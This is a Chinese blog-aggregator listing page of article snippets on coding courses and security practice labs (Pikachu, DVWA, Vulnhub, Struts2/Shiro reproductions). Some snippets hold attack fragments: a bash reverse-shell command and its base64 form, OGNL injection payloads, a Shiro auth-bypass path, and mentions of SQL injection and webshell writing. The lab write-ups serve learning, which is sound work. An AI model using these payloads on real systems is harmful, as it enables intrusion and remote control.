E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
实训靶场
【C++】反向迭代器模拟实现
樊梓慕:个人主页个人专栏:《C语言》《数据结构》《蓝桥杯试题》《LeetCode刷题笔记》《
实训
项目》《C++》《Linux》《算法》每一个不曾起舞的日子,都是对生命的辜负目录前言1.利用适配器的思想2
樊梓慕
·
2024-01-26 11:24
C++
c++
开发语言
全栈
实训
管理系统:Java、Spring Boot、Vue和MySQL的实战解析
⚡⚡Java、Python、微信小程序、大数据实战项目集⚡⚡文末获取源码文章目录⚡⚡文末获取源码
实训
管理系统-研究背景
实训
管理系统-技术
实训
管理系统-图片展示
实训
管理系统-代码展示实
计算机毕业编程指导师
·
2024-01-26 10:05
Java
Python
微信小程序
大数据实战项目集
java
spring
boot
vue.js
课程设计
mysql
开发语言
实训
如何使用docker实现越权漏洞-webug
靶场
搭建(超详解)
越权漏洞-webug
靶场
搭建1.打开dockersystemctlstartdocker2.查找webugdockersearchwebug3.拉取docker.io/area39/webug镜像dockerpulldocker.io
爱喝水的泡泡
·
2024-01-26 09:20
docker
容器
运维
去新宝公司
实训
的感受
要去公司
实训
的前一晚,那天晚上,我在床上躺着心里想着去到哪里有多激动,虽然以前也会因为一些事激动而睡不着觉,但是那晚虽然我困意十足,但是心里幻想着去到那里有心里所希望发生的事,从心底不由自主的激动。
1cc0c12f2dbf
·
2024-01-26 06:14
利用sqlmap探测get类型注入
环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客基础:GET基于报错的sql注入利用-脱库-CSDN博客sqlmap工具是kali自带的例子我都用sql
靶场
的第一关做演示
狗蛋的博客之旅
·
2024-01-26 06:00
Web安全渗透
oracle
数据库
get基于报错的sql注入利用-读敏感文件和写入一句话木马
推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客基础:GET基于报错的sql注入利用-脱库-CSDN博客1、selectintooutfile或dumpfile写入一句话马这里用Sqli-labs
靶场
的第一关做演示
狗蛋的博客之旅
·
2024-01-26 06:57
Web安全渗透
sql
数据库
java/php/node.js/pythonSpringboot+Vue实习
实训
管理系统【2024年毕设】
本系统带文档lw万字以上文末可领取本课题的JAVA源码参考开发环境开发语言:Java框架:ssm技术:ssm+vueJDK版本:JDK1.8服务器:tomcat7数据库:mysql5.7或8.0数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:Maven3.3.9浏览器:建议谷歌浏览器或edge功能模块系统界面2023-2024年成品除了以上作品下面
宇恒程序设计
·
2024-01-26 02:27
spring
boot
后端
java
红日
靶场
1
记一次内网渗透红日
靶场
下载地址:漏洞详情
靶场
地址分配:模拟外网网段:192.168.174.0/24模拟内网网段:192.168.52.0/24攻击机:kali:192.168.174.131靶机:域控服务器
Hello_Brian
·
2024-01-26 01:01
内网横向
运维
学困生经验总结
记得我们的学困生改善
实训
班是在8月30号开始的第一次课,当时我毫不犹豫的加入了这个班。因为我深知,在乡村的学校,尤其是家长思想封闭落后的学校,班里的学困生特别多。
059260bd4d1e
·
2024-01-26 00:21
实训
考核
其实我学医还是有些优势的,上午三大常规考试,我对一个尿常规分析,老师说,说的很对很自信的说出来了答案,我就喜欢有自信的人,这个同学是到现在为止全场考核最高分98分。下午心肺复苏考试,老师看了我的操作直接对我说,你是你这组组长你不用考了看她们考就行给她们再打个分。
刘冬咚
·
2024-01-25 23:57
使用虚拟机搭建pikachu
靶场
VMware中搭建,基于linux的操作系统2.现在打开虚拟机3.此时的账号和密码都是“kali”,之后进行登录这时我们就来到了kali的主页面,此时第一步也完成了二、打开phpstudy我们打的所有
靶场
都是需要使用到
穿山甲敲代码
·
2024-01-25 20:53
docker
容器
运维
linux
pikachu
靶场
搭建与密码爆破
数据库密码配置/pikachu/inc/config.inc.php文件配置数据库连接密码初始化访问/pikachu/install.php初始化pikachu暴力破解基于表单提示用户名已知如admin输入用户名和密码(随便),开启代理拦截BurpSuite抓包,发送到Intruder模块为密码添加有效载荷手动添加可能的密码或载入密码字典开始爆破,查看验证特殊的返回包成功爆破密码用户名未知随便输入
sxtym
·
2024-01-25 20:23
web安全
Pikachu
靶场
全级别通关教程详解
pikach通关暴力破解Cross-SiteScriptingXSS(跨站脚本)概述跨站脚本漏洞类型及测试流程跨站脚本漏洞常见类型XSS漏洞形成的原因:跨站脚本漏洞测试流程tips反射型XSS(get)反射型XSS(post)存储型XSSDOM型XSSDOM型XSS-XCSRF(跨站请求伪造漏洞)CSRF漏洞概述为什么会出现CSRF漏洞*CSRF与XSS的区别如何确认一个web系统存在csrf漏洞
HypeRong
·
2024-01-25 20:22
漏洞靶场
安全
web安全
pikachu
靶场
通关(上)
第一关:暴力破解1.1基于表单的暴力破解首先打开burpsuite拦截,然后在随意输入账号密码,可在burpsuite上抓到皮卡丘的包,可以看到刚才输入的账号密码我们选择放包,然后看到提示“用户名或密码不存在”,说明刚刚随便输入的账号密码是错的(废话)这怎么办呢,可以看到右上角有提示,我们点开发现三个账号密码,其中肯定有一个是正确的,当然我们可以一个一个地试。但是数量多的话我们就不好试了。把这三个
幕溪WM
·
2024-01-25 20:50
pikachu靶场通关
安全
web安全
网络安全
网络
pikachu
靶场
通关指南
靶场
搭建docker搭建dockerpullarea39/pikachudockerrun-itd-p80:80-p3306:3306--name“p1”area39/pikachu暴力破解基于表单的暴力破解直接
只会打靶场的小菜鸟
·
2024-01-25 20:50
web靶场
安全
渗透学习-
靶场
篇-pikachu
靶场
详细攻略(持续更新中-)
提示:仅供进行学习使用,请勿做出非法的行为。如若由任何违法行为,将依据法律法规进行严惩!!!文章目录前言一、pikachu安装二、SQL-Inject数字型注入(post)利用burpsuite注入利用hackbar注入字符型注入(get)搜索型注入xx型注入insert/update注入delete注入http头部注入布尔盲注时间盲注宽字节注入三、xss安装反射型(get)反射型(post)存储
dfzy$_$
·
2024-01-25 20:49
渗透学习
学习
web安全
安全
pikachu
靶场
通关技巧详解
目录一.暴力破解二.Cross-SiteScripting(XSS跨站脚本攻击)三.CSRF(跨站请求伪造)四.SQL-Inject五.RCE六.FileInclusion(文件包含漏洞)七.UnsafeFiledownload(不安全的文件下载漏洞)八.UnsafeFileupload(不安全的文件上传)九.OverPermission(逻辑越权)十.../../(目录遍历漏洞)十一.敏感信息泄
henghengzhao_
·
2024-01-25 20:46
javascript
服务器
网络安全
Pikachu(皮卡丘)
靶场
搭建
目录一、什么是Pikachu(皮卡丘)二、
靶场
配置一、什么是Pikachu(皮卡丘)Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。
机智的Jerry
·
2024-01-25 20:46
安全
web安全
pikachu
靶场
通关(全)
一.暴力破解1.1基于表单的暴力破解1.1.1漏洞利用burp抓包,ctrl+i添加爆破根据返回长度得到两个用户admin123456testabc1231.1.2源代码分析文件路径在:vul/burteforce/bf_form.php通过注释以及说明了,没有验证码也没有其他的访问控制,直接开始爆破就行1.2验证码绕过(onserver)1.2.1漏洞利用比上面多了一个验证码,我们在提交时抓包,
weixin_45111459
·
2024-01-25 20:45
安全
Pikachu漏洞
靶场
系列之暴力破解
前言这是Pikachu漏洞
靶场
系列的第一篇~~(应该会连载吧)~~,先简单介绍一下Pikachu这个
靶场
。该
靶场
由国人开发,纯中文,且练习时遇到难点还可以查看提示,另外还有配套的学习视频。
程序员负总裁
·
2024-01-25 20:45
安全
前端
javascript
应用协议漏洞
其中rsync协议默认监听873端口1.未授权访问打开
靶场
判断漏洞是否存在rsyncrsync://目标ip:端口读取文件rsyncrsync://47.99.49.128:873/src/tmp/下载文件
果粒程1122
·
2024-01-25 18:58
web安全
网络安全
越权漏洞(基于catfishcms
靶场
的垂直越权、水平越权)
垂直越权创建一个普通用户test、和管理员用户admin页面的url对比,未发现任何越权url创建一个后台用户test1、和管理员用户admin页面的url对比test1后台页面,只有内容管理admin后台管理页面在页面管理的新建页面的url和test1用户做比较,多了admin/index/newpage.html在test1用户管理页面的url后加上admin/index/newpage.ht
€On my way•£
·
2024-01-25 16:14
信息安全
web安全
网络安全
安全性测试
php
安全威胁分析
网络安全之XXE漏洞总结(pikachu
靶场
案例解析)
XXE漏洞是基于XML的漏洞先了解XML相关知识XML知识XML指可扩展标记语言(EXtensibleMarkupLanguage)。XML是一种很像HTML的标记语言。XML的设计宗旨是传输数据,而不是显示数据。html显示数据XML标签没有被预定义。您需要自行定义标签。XML被设计为具有自我描述性。XML是W3C的推荐标准作用存储数据传输数据语法规则:XML文档必须有根元素XML声明(可选)所
€On my way•£
·
2024-01-25 16:13
信息安全
网络安全
web安全
网络
duomi
靶场
(变量覆盖)获取webshell
tips什么是变量覆盖?就是用新的值去覆盖原来的值,举个栗子$a=123;$a=234;//第二个变量a的值覆盖了第一个a的值,所以输出结果是234echo$a;变量覆盖漏洞如何入手?变量覆盖漏洞大多数由函数使用不当导致,经常引发变量覆盖漏洞的函数有:extract(数组)把一个数组的键全部变为变量,举个栗子$a=array('name'=>'tom');extract($a)//从这里开始,na
€On my way•£
·
2024-01-25 16:13
信息安全
web安全
网络安全
安全威胁分析
php
burp
靶场
--WebSockets安全漏洞
burp
靶场
–WebSockets安全漏洞https://portswigger.net/web-security/websockets/what-are-websockets###什么是WebSocket
0rch1d
·
2024-01-25 15:54
burp靶场
WEB安全
渗透测试
网络安全
web安全
第12周
三周已过,随之而来的就是我们的数控
实训
结束了,在三周里我们学了很多,我们也开创了我们学校的历史先河,成为了第一个做车铣结合零件的班级。
斗穹
·
2024-01-25 14:28
WEB安全渗透测试-pikachu&DVWA&sqli-labs&upload-labs&xss-labs
靶场
搭建(超详细)
目录phpstudy下载安装一,pikachu
靶场
搭建1.下载pikachu2.新建一个名为pikachu的数据库3.pikachu数据库配置编辑4.创建网站编辑5.打开网站6.初始化安装二,DVWA
靶场
搭建
aozhan001
·
2024-01-25 14:00
web安全
xss
安全
网络安全
焦虑的二十岁
在
实训
室,我问一个学长,你的简历投的怎么样了,学长尴尬的笑了一下,说:试试看吧。我也是无关痛痒的说了句,会好的。在我心中,学长也算是很认真
对的猫
·
2024-01-25 12:58
PWN入门&Protostar
靶场
Stack系列
Protostar
靶场
地址https://exploit.education/protostar/溢出源码分析#include#include#includeintmain(intargc,char**
cike_y
·
2024-01-25 12:38
PWN
pwn
ctf
gdb
网络安全
xpath注入漏洞
靶场
搭建记录
目录漏洞简单介绍
靶场
搭建
靶场
测试漏洞简单介绍这种漏洞允许攻击者注入恶意XPath代码,从而操纵应用程序对XML数据的处理方式。
墨痕诉清风
·
2024-01-25 12:35
国际证书研究
安全
web安全
智慧小区安全防护系统
一.
实训
背景1、智慧小区工作需求各类小区分布在城市的各个⾓落,多构成单个或多个独立的区域,而这使得小区的管理更加复杂和多变,给小区安防带来很⼤压力,技防手段越来越成为重点。
会收到花吗
·
2024-01-25 12:33
嵌入式培训机构四个月
实训
课程笔记(完整版)-Linux ARM平台编程第二天-ARM汇编(物联技术666)
链接:https://pan.baidu.com/s/1bG0tuVaACATvjLwD05j1FQ?pwd=1688提取码:1688上午:ARM编程模型下午:常用ARM指令教学内容:1、ARM数据类型字节(Byte):在ARM体系结构及常见的8位/16位处理器体系结构中,字节的长度均为8位字(Word):在ARM体系结构中,字的长度为32位,而在8位/16位处理器体系结构中,字的长度一般为16位
vx349014857
·
2024-01-25 11:32
嵌入式培训课程笔记
笔记
linux
arm开发
嵌入式培训机构四个月
实训
课程笔记(完整版)-Linux ARM平台编程第三天-自己编写Bootloader---基本功能流程(物联技术666)
链接:https://pan.baidu.com/s/1KE2cq_kHaRW5HsP29hgL6w?pwd=1688提取码:1688CPU上电后会从IO空间的某地址取第一条指令。但此时:PLL没有启动,CPU工作频率为外部输入晶振频率,非常低;CPU工作模式、中断设置等不确定;存储空间的各个BANK(包括内存)都没有驱动,内存不能使用。在这种情况下必须在第一条指令处做一些初始化工作,这段初始化程
vx349014857
·
2024-01-25 11:32
嵌入式培训课程笔记
linux
笔记
arm开发
嵌入式培训机构四个月
实训
课程笔记(完整版)-Linux ARM平台编程第三天-Bootloader编写(物联技术666)
链接:https://pan.baidu.com/s/1KE2cq_kHaRW5HsP29hgL6w?pwd=1688提取码:1688链接脚本0.Contents1.概论2.基本概念3.脚本格式4.简单例子5.简单脚本命令6.对符号的赋值7.SECTIONS命令8.MEMORY命令9.PHDRS命令10.VERSION命令11.脚本内的表达式12.暗含的连接脚本1.概论编译的过程得到的obj文件,
vx349014857
·
2024-01-25 11:02
嵌入式培训课程笔记
笔记
linux
arm开发
嵌入式培训机构四个月
实训
课程笔记(完整版)-C++和QT编程第六天-Qt UDP编程(物联技术666)
链接:https://pan.baidu.com/s/1-u7GvgM0TLuiy9z7LYQ80Q?pwd=1688提取码:1688在Qt中提供了QUdpSocket类来进行UDP数据报(datagrams)的发送和接收。这里我们还要了解一个名词Socket,也就是常说的“套接字”。Qt网络之UDP网络基础学习是本文要介绍的内容,UDP(UserDatagramProtocol即用户数据报协议)
vx349014857
·
2024-01-25 11:27
嵌入式培训课程笔记
笔记
c++
qt
DVWA
靶场
——File Inclusion(文件包含漏洞)
1.文件包含漏洞1.什么是文件包含?程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。FileInclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_on
小小邵同学
·
2024-01-25 10:09
安全
web安全
Python期末
实训
,爬虫实验报告
Python爬取豆瓣电影版权声明:本文为博主原创文章,遵循CC4.0BY-SA版权协议,转载请附上原文出处链接和本声明。本文链接:https://blog.csdn.net/qq_45774645/article/details/118071499简介:Python中有很多第三方库,可以快速处理网页,我们使用四个库来爬取网页,并且保存数据importurllib.request#获取整个网页内容f
等待花开I
·
2024-01-25 09:47
python
python
正则表达式
爬虫
Vulnhub-dc5
靶场
下载https://download.vulnhub.com/dc/DC-5.zip信息收集#nmap-sn192.168.1.0/24-oNlive.portStartingNmap7.94(https
YAy17
·
2024-01-25 08:38
Vulnhub
网络安全
web安全
安全
安全威胁分析
学习
BUPT果园物联大二下不完全回忆
主要我对不同课程的记忆点(主要是专业课)北邮国院物联网工程专业大二下学期课程记录I.必修课:1.数字电路与逻辑设计2.Java高级语言程序设计3.数据库4.概率论与随机过程5.产品开发与管理6.Design&Build
实训
本小爷世界第一花式帅
·
2024-01-25 08:34
BUPT果园课程回忆录
经验分享
【Java EE
实训
】 day1 ------ 浅尝前端之初创html
本次
实训
任务是最终做出一款停车管理系统。今天主要工作就是安装环境:Idea、Mysql、navicat。软件已经装过多次,略过。
忘却的旋律dw
·
2024-01-25 07:25
java-ee
java
html5
[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2134)
二、漏洞复现春秋云境.com进入
靶场
开始复现构造payload/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_
free key
·
2024-01-25 06:41
漏洞复现
春秋云境靶场
Struts
apache
struts
web安全
安全
[漏洞复现]Apache POI < 3.10.1 XXE(CVE-2014-3529)
二、漏洞复现春秋云境.com进入
靶场
准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
web安全
apache
安全
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
二、漏洞复现春秋云境.com进入
靶场
开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
Struts
apache
struts
java
web安全
安全
[漏洞复现]Apache Shiro < 1.6.0 验证绕过漏洞(CVE-2020-13933)
二、漏洞复现春秋云境.com进入
靶场
开始复现/admin/%3b三、漏洞处置建议把
靶场
关了,跟漏洞说“白白吧”
free key
·
2024-01-25 06:10
春秋云境靶场
漏洞复现
安全
网络
web安全
[漏洞复现]Apache Struts2/S2-015 (CVE-2013-2135)
二、漏洞复现春秋云境.com进入
靶场
开始复现构造好payload,弹nc${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#
free key
·
2024-01-25 06:04
Struts
春秋云境靶场
apache
struts
java
web安全
安全
sqlmap使用教程(3)-探测注入漏洞
1、探测GET参数以下为探测DVWA
靶场
low级别的sql注入,以下提交方式为GET,问号(?)将分隔URL和传输的数据,而参数之间以&相连。
fanmeng2008
·
2024-01-24 21:49
安全杂记
web安全
网络安全
小迪安全学习笔记--第38天:web漏洞-反序列化之PHP和JAVA全解(下)
靶场
:webGoathttps://blog.csdn.net/
铁锤2号
·
2024-01-24 16:52
web安全自学笔记
安全
38-WEB漏洞-反序列化之PHP&JAVA全解(下)
WEB漏洞-反序列化之PHP&JAVA全解(下)一、Java中API实现二、序列化理解三、案例演示3.1、本地3.2、Java反序列化及命令执行代码测试3.3、WebGoat_Javaweb
靶场
反序列化测试
月亮今天也很亮
·
2024-01-24 16:17
小迪安全
web安全
学习
前端
php
java
旅游MR混合现实情景
实训
教学系统教学
一、MR混合现实情景
实训
教学系统的优点真实场景模拟:通过MR技术,学生可以在虚拟环境中模拟真实的旅游场景,如酒店、景区、交通工具等,以便更好地理解和掌握相关知识。
英途信息
·
2024-01-24 15:15
旅游
mr
新画图不好用?『 图层困扰?』『 剪切板拷贝失败?』旧版画图软件yyds
樊梓慕:个人主页个人专栏:《C语言》《数据结构》《蓝桥杯试题》《LeetCode刷题笔记》《
实训
项目》《C++》《Linux》《算法》每一个不曾起舞的日子,都是对生命的辜负目录前言新版画图的两大问题:1.1
樊梓慕
·
2024-01-24 11:14
经验分享
笔记
上一页
6
7
8
9
10
11
12
13
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他